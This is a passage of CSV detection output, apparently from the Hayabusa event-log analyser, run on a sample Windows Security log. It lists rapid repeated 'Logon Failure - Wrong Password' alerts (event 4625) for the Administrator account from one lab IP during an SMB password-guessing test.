NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: 